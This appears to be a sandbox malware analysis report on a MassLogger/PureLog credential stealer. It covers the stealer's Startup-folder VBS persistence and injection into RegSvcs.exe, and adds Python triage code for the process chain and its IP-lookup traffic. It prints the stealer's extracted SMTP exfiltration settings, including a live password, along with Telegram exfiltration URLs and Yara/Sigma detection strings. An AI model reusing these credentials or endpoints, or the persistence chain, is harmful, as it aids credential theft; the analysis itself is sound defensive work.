Windows Analysis Report
ref_97024130865.exe

Overview

General Information

Sample name: ref_97024130865.exe
Analysis ID: 1576075
MD5: 687af4583057dd6924f0102def1b8f89
SHA1: 451232efa9e8891d1c87c81b9e5be3fb7e62e5b5
SHA256: caaff6d88cafff7aef0ccc6ba09e9e15b54763b8ee85054eff6d812edc5302c6
Tags: exe, user-adrian__luca

Detection

MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

The family labels come from the Joe Security Yara rules and from the configuration extractor, which identifies the .NET payload as MassLogger with SMTP exfiltration (see AV Detection). Community rules for Snake Keylogger and Encrial also match the unpacked .NET payloads, and a RedLine rule matches the native nonplacental.exe dumps; of that rule's strings, $s4 to $s6 are generic C runtime text, so that hit is weaker evidence than the Joe Security rules and the extracted configuration.

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ref_97024130865.exe (PID: 1772 cmdline: "C:\Users\user\Desktop\ref_97024130865.exe" MD5: 687AF4583057DD6924F0102DEF1B8F89)
    • nonplacental.exe (PID: 5028 cmdline: "C:\Users\user\Desktop\ref_97024130865.exe" MD5: 687AF4583057DD6924F0102DEF1B8F89)
      • RegSvcs.exe (PID: 6660 cmdline: "C:\Users\user\Desktop\ref_97024130865.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 6976 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • nonplacental.exe (PID: 5748 cmdline: "C:\Users\user\AppData\Local\juvenile\nonplacental.exe" MD5: 687AF4583057DD6924F0102DEF1B8F89)
      • RegSvcs.exe (PID: 3128 cmdline: "C:\Users\user\AppData\Local\juvenile\nonplacental.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Configuration

{"EXfil Mode": "SMTP", "From": "sendxpreview@ypcog.shop", "Password": "k4T*5ia*ES", "Server": "ypcog.shop", "To": "preview@ypcog.shop", "Port": 587}
Yara matches in memory dumps (Source, Rule, Description, Author, Strings)

Source: 00000005.00000002.2197923866.0000000003C60000.00000004.00001000.00020000.00000000.sdmp | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen
Strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 37 88 44 24 2B 88 44 24 2F B0 AF 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_MassLogger | Description: Yara detected MassLogger RAT | Author: Joe Security
Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
(31 further memory-dump matches not shown)
Yara matches in unpacked PEs (Source, Rule, Description, Author, Strings)

Source: 5.2.nonplacental.exe.3c60000.1.raw.unpack | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen
Strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 37 88 44 24 2B 88 44 24 2F B0 AF 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack | Rule: JoeSecurity_MassLogger | Description: Yara detected MassLogger RAT | Author: Joe Security
Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 6.2.RegSvcs.exe.2970000.2.raw.unpack | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
(93 further unpacked-PE matches not shown)

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs", ProcessId: 6976, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs", ProcessId: 6976, ProcessName: wscript.exe
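The process tree and the two Sigma process-creation events above describe the whole persistence chain: wscript.exe runs nonplacental.vbs out of the Startup folder, the script starts nonplacental.exe from %LOCALAPPDATA%\juvenile, and that binary starts RegSvcs.exe whose logged command line is nonplacental.exe's own, the image/command-line mismatch that accompanies "Creates a process in suspended mode" and "Writes to foreign memory regions". The Python below is an added example, not Joe Sandbox's or the malware's code: it applies those checks to Sysmon-style process-creation records constructed from the report's PIDs, paths and command lines. The parent of wscript.exe (explorer.exe), the notepad.exe control event and the short list of user-writable path markers are assumptions.

```python
"""Triage of process-creation events for the execution chain shown in this report.

Added example (not Joe Sandbox code). SAMPLE_EVENTS mirror the report's process
tree; the explorer.exe parent and the notepad.exe control event are constructed.
"""
from dataclasses import dataclass
import ntpath


@dataclass
class ProcEvent:
    pid: int
    image: str          # path of the executable actually mapped (Sysmon "Image")
    cmdline: str        # command line as logged (Sysmon "CommandLine")
    parent_image: str   # parent's image path, "" when unknown


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTENSIONS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
STARTUP_FOLDER = "\\microsoft\\windows\\start menu\\programs\\startup\\"
# .NET framework utilities often used as injection hosts; RegSvcs.exe is the one in this report.
DOTNET_UTILITIES = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
# Assumed, deliberately small list of path markers that an unprivileged user can write to.
USER_WRITABLE_MARKERS = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\")


def split_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line into tokens, keeping double-quoted spans together."""
    tokens, current, quoted = [], "", False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if current:
                tokens.append(current)
                current = ""
        else:
            current += ch
    if current:
        tokens.append(current)
    return tokens


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def in_user_writable_path(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE_MARKERS)


def triage_event(ev: ProcEvent) -> list[str]:
    """Return the indicators matched by one process-creation event."""
    hits = []
    image = basename(ev.image)
    tokens = split_cmdline(ev.cmdline)

    # 1. Mapped image differs from the executable named in the command line:
    #    RegSvcs.exe in the tree runs under nonplacental.exe's command line.
    if tokens and basename(tokens[0]) != image:
        hits.append(f"image/command-line mismatch: {image} launched as {basename(tokens[0])}")

    # 2. wscript/cscript executing a script; worse when it lives in the Startup folder.
    if image in SCRIPT_HOSTS:
        for arg in tokens[1:]:
            if arg.lower().endswith(SCRIPT_EXTENSIONS):
                location = "Startup folder" if STARTUP_FOLDER in arg.lower() else "disk"
                hits.append(f"script host running {ntpath.basename(arg)} from {location}")

    # 3. A .NET utility spawned by a binary living in a user-writable directory.
    if image in DOTNET_UTILITIES and in_user_writable_path(ev.parent_image):
        hits.append(f"{image} spawned by {basename(ev.parent_image)} from a user-writable path")

    # 4. A script host launching an executable from a user-writable directory.
    if basename(ev.parent_image) in SCRIPT_HOSTS and in_user_writable_path(ev.image):
        hits.append(f"{basename(ev.parent_image)} launched {image} from a user-writable path")
    return hits


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    return {ev.pid: triage_event(ev) for ev in events}


# Constructed events mirroring the report's persistence (second) execution chain.
SAMPLE_EVENTS = [
    ProcEvent(6976, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs"',
              r"C:\Windows\explorer.exe"),  # parent assumed; the report leaves ParentImage empty
    ProcEvent(5748, r"C:\Users\user\AppData\Local\juvenile\nonplacental.exe",
              r'"C:\Users\user\AppData\Local\juvenile\nonplacental.exe"',
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(3128, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Users\user\AppData\Local\juvenile\nonplacental.exe"',
              r"C:\Users\user\AppData\Local\juvenile\nonplacental.exe"),
    ProcEvent(4242, r"C:\Windows\System32\notepad.exe",  # constructed benign control
              r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt',
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, hits or ["no indicators"])
```

The mismatch check is the cheapest of the four to deploy and does not depend on the RegSvcs.exe name: any signed host process whose CommandLine names a different executable is worth a look at its memory regions.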

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\juvenile\nonplacental.exe, ProcessId: 5028, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nonplacental.vbs

Suricata IDS Alerts

Timestamp                         SID      Severity  Classtype                Source IP    Source Port  Destination IP  Destination Port  Protocol
2024-12-16T14:11:35.342732+0100   2803274  2         Potentially Bad Traffic  192.168.2.5  49704        193.122.130.0   80                TCP
2024-12-16T14:11:46.858321+0100   2803274  2         Potentially Bad Traffic  192.168.2.5  49706        193.122.130.0   80                TCP


AV Detection

Source: 3.2.RegSvcs.exe.3dae190.5.raw.unpack | Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "sendxpreview@ypcog.shop", "Password": "k4T*5ia*ES", "Server": "ypcog.shop", "To": "preview@ypcog.shop", "Port": 587}
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | ReversingLabs: Detection: 73%
Source: ref_97024130865.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Joe Sandbox ML: detected
Source: ref_97024130865.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: ref_97024130865.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49709 version: TLS 1.0
Source: Binary string: _.pdb | source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: nonplacental.exe, 00000002.00000003.2077461971.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2078549075.0000000004190000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195475586.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195865927.0000000004270000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: nonplacental.exe, 00000002.00000003.2077461971.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000002.00000003.2078549075.0000000004190000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195475586.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000003.2195865927.0000000004270000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0103445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0103C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0103C6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0103EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0103F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0103F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_010337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_01033B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_0103BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0065445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0065C6D1 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0065C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0065EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0065F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0065F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_006537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_00653B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\juvenile\nonplacental.exe | Code function: 2_2_0065BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00F8D4E0 4x nop then mov dword ptr [ebp-20h], 00000000h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0250D4E0 4x nop then mov dword ptr [ebp-20h], 00000000h
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.21.67.152
Source: Joe Sandbox View | IP Address: 193.122.130.0
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.130.0:80
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\ref_97024130865.exe | Code function: 0_2_010422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002A69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E88000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002B08000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.3297525367.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3298333959.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3295937256.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296129712.0000000002970000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000003.00000002.3296052584.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3296227369.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
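The network entries above record two public-IP lookups by the injected RegSvcs.exe: checkip.dyndns.org, fetched with the hard-coded "MSIE 6.0" User-Agent, and reallyfreegeoip.org/xml/<ip>, fetched with no User-Agent at all, which together underlie the "Tries to detect the country of the analysis system (by using the IP)" signature. The Python below is an added example, not part of the Joe Sandbox report: it parses raw HTTP request heads rebuilt from the "HTTP traffic detected" lines, flags each one against those indicators, and correlates the two-step pattern (public-IP lookup, then geolocation of a concrete address) per client. The timestamps, the request ordering, the second client 192.168.2.7 and the www.example.com control request are constructed.

```python
"""Classify captured HTTP requests against the network indicators of this report.

Added example, not Joe Sandbox code. SAMPLE_REQUESTS are rebuilt from the report's
"HTTP traffic detected" entries; SAMPLE_RECORDS add constructed timestamps and clients.
"""
from datetime import datetime, timedelta

# Public-IP services contacted by the sample (DNS and HTTP entries above).
IP_CHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
GEOIP_HOST = "reallyfreegeoip.org"
# Exact User-Agent string seen in this report's checkip.dyndns.org requests.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"


def parse_request(raw: str) -> tuple[str, str, dict[str, str]]:
    """Split an HTTP/1.x request head into (method, path, headers); header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


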